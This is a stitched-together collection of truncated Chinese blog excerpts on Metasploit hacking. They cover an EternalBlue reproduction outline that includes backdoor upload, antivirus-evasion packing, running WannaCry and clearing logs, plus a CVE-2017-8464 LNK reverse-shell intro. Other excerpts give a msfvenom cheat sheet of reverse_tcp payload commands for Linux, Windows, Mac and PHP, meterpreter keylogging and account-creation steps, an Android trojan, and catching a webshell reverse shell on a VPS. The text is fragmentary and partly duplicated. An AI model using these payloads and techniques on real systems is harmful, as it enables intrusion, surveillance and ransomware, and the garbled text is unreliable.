目录一、永恒之蓝概述二、SMB协议三、准备工作四、漏洞复现1、主机发现2、端口扫描3、利用模块五、演示功能1.获取cmd2.捕获屏幕3.上传文件4.下载文件5.远程登录6.上传后门7.免杀加壳8.运行wannacry9.清除日志六、预防方案1.打开防火墙2.安装杀毒软件3.禁用445端口 4.IPsec关闭高危端口5.注册表关闭445端口6.安装补丁七、总结一、永恒之蓝概述 永恒之蓝(EternalBlue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日,不法分子通过改造“永恒之
目录一、永恒之蓝概述二、SMB协议三、准备工作四、漏洞复现1、主机发现2、端口扫描3、利用模块五、演示功能1.获取cmd2.捕获屏幕3.上传文件4.下载文件5.远程登录6.上传后门7.免杀加壳8.运行wannacry9.清除日志六、预防方案1.打开防火墙2.安装杀毒软件3.禁用445端口 4.IPsec关闭高危端口5.注册表关闭445端口6.安装补丁七、总结一、永恒之蓝概述 永恒之蓝(EternalBlue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日,不法分子通过改造“永恒之
说明:本章内容,仅供学习,不要用于非法用途(做个好白帽)(一)震网三代漏洞“震网三代”官方漏洞编号是CVE-2017-8464,2017年6月13日,微软官方发布编号为CVE-2017-8464的漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危传播的载体一般是LNK,LNK是windows系统内应用程序快捷方式文件的文件类型后缀名。被攻击机插入存在攻击lnk的U盘后会反弹shell,哪怕是被隔离的内网,也可以在不上网的情况下被攻击后来发现该漏洞曾被攻击者用于攻击中国地震局的自动地震台网
目录一、MSF简介渗透环境二、渗透流程1.KaliLinux进入Root模式 2.生成可执行文件3.运行msfconsole命令 4.配置参数 5.在靶机Windows11打开可执行文件6.渗透一、MSF简介MsfvenomaMetasploitstandalonepayloadgenerator,Alsoareplacementformsfpayloadandmsfencode.是用来生成后门的软件。MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。渗透环境使用KaliLinux进行演示操作目标靶机:Windows11软件:Ms
Linux msfvenom-plinux/x86/meterpreter/reverse_tcpLHOST=LPORT=-felf>shell.elfWindowsmsfvenom-pwindows/meterpreter/reverse_tcpLHOST=LPORT=-fexe>shell.exeMac msfvenom-posx/x86/shell_reverse_tcpLHOST=LPORT=-fmacho>shell.machoWebPayloadsPHP msfvenom-pphp/meterpreter_reverse_tcpLHOST=LPORT=-fraw>shell.p
更新中一.基础:shell中直接输入msfconsole开始运行use+模块路径使用模块search+模块关键字用来搜索模块back返回主界面模块中:info查看模块信息showoptions查看模块设置项showtargets显示可选择的target(targert更像是给你选项,你去细化攻击细节,但是明明目标机器是64位系统,我选择target为64攻击不匹配,但是选择86却攻击成功,为什么呢?这个问题解决了,因为生成木马的时候会有生成64位还是32位的选项,默认是32位,也就是×86,因为木马是×86,既然x86的木马执行成功了,选择target自然也是x86)expolit/run开始
目录1、文件交互指令2、上传下载文件(windows)3、屏幕截图(windows)4、键盘记录(windows) 1、先启动记录keyscan_start2、显示键盘输入内容keyscan_dump 3、结束监控keyscan_stop5、创建账户(windows)1、先看下目标靶机已存在用户 2、使用getgui创建一个用户名为xiaowei 密码为123456 的账户6、音频录像(Android) 7、提权(Windows) 方法一:方法二:1、文件交互指令CommandDescriptioncd{路径}切换靶机目录cat读取文件目录cp 复制文件到目标mv移动到目标chmod修改文件
MSF是Metasploit的简称,Metasploit是一款开源的安全漏洞检测工具,非常强大,分别有Windows版和Linux版,工具里集成了许多微软公布的漏洞(0day)。我这里做测试的系统是Backboxlinux,这是一款网络渗透,信息安全评估系统。里边安装了许许多多的工具。其中MSF就自带有。当然还有其它的比如Kalilinux、BackTrack这些等等。环境:Backboxlinux+MSF目标:一台安卓手机既然是入侵安卓手机,肯定要先配置一个安卓木马,那我们看看本机的IP 本机IP:192.168.1.6在到终端输入命令:msfvenom-pandroid/meterpret
前言:Metasploit是TheMetasploitFramework的简称,也可以叫做MSF!MSF高度模块化即框架由多个module组成,是全球最受欢迎的工具。MetasploitFramework(MSF)远远不仅仅是一个漏洞的集合。这是您可以建立和利用您的自定义需求的基础架构。这使您可以专注于您独特的环境,而不必重新发明轮子。官网地址:https://www.metasploit.com/,在这里你可以获得官方文档及其他帮助,官方文档中有大量API开发规范项目地址:https://github.com/rapid7/metasploit-framework/1.0.MSF架构基础库文
文章目录前言一、哥斯拉🐴上线二、反弹shell回vps的msf总结前言用文件上传漏洞,哥斯拉木马上传后,如何将shell反弹回msf做进一步的提权和内网渗透等后续操作十分重要,所以今天就来记录一下。提示:涉及真实资产,所以很多地方要打码一、哥斯拉🐴上线上线之后,不知道是权限不够还是咋滴,反正shell的交互界面不是很友好,命令不能完全回显。因此,用到msf模块。二、反弹shell回vps的msf1、vps服务器上的msf:Metasploittip:Youcanusehelptoviewallavailablecommandsmsf6>useexploit/multi/handler[*]Us